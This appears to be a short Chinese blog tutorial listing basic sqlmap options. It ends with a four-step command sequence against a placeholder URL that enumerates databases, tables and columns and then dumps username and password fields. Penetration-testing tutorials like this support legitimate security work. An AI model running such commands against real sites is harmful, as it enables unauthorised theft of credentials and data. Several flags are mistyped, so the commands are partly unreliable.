sqlmap基础命令

  sqlmap 是一个开源的渗透测试工具,用来自动化检测,利用SQL注入漏洞,获取数据库连接服务器权限。

下载https://github.com/sqlmapproject/sqlmap/zipball/master

swlmap支持MySQL,Oracle,等数据库的各种检测。

注入模式:布尔盲注,根据返回页面条件注入

基础命令

-h ,help   显示基本帮助信息

-hh    显示高级帮助信息

-level=LEVEL   执行测试的等级(1-5,默认1)

-risk=RISK    执行测试的风险(0-3,默认1)

-v   VERBOSE 显示信息的详细级别:0-6(默认为1)

-u  URL,  目标URL

-m  BULKFILE   将目标地址保存在文件中,按照顺序进行批量检测

-r   REQUESTFILF    从文件中加载 HTTP请求,sqlmap可以从文件中获取HTTP请求

-b   获取数据库版本信息

-D  指定数据库名

-T   指定表名

-C  指定字段

-is-dba  当前用户权限(是否为root权限)

-current-db  网站当前数据库

 --string = STRING 在基于布尔的注入时,有的时候返回的页面一次一个样,需要我们自己判断出标志着返回正确页面的标志,会根据页面的返回内容这个标志(字符串)判断真假,可以使用这个参数来制定看见什么字符串就是真。

--dbs 目标服务器中有什么数据库,常用,直接用--dbs

--tables目标数据库有什么表,常用,直接用--tables

--columns目标表中有什么列,常用,直接用--columns

--dump查询指定范围的全部数据。

 

SQLMAP  用于mysql注入

 

1>查询数据库     sqlmap.py -u http://www.xxx.com/link.php?id=123  --dbs

2>通过1>的数据库查找表(数据库test)    sqlmap.py  -u http://www.xxx.com/link.php?id=123  -D test  --tables

3>通过2>的表得到列(表名table_id)   sqlmap.py  -u http://www.xxx.com/link.php?id=123  -D test  -T  table_id  --colums

4>通过3>获取字段(user,password字段)   sqlmap.py  -u http://www.xxx.com/link.php?id=123  -D user  -C  user,password  --dump

 

转载于:https://www.cnblogs.com/Scholar-liu/p/11240667.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值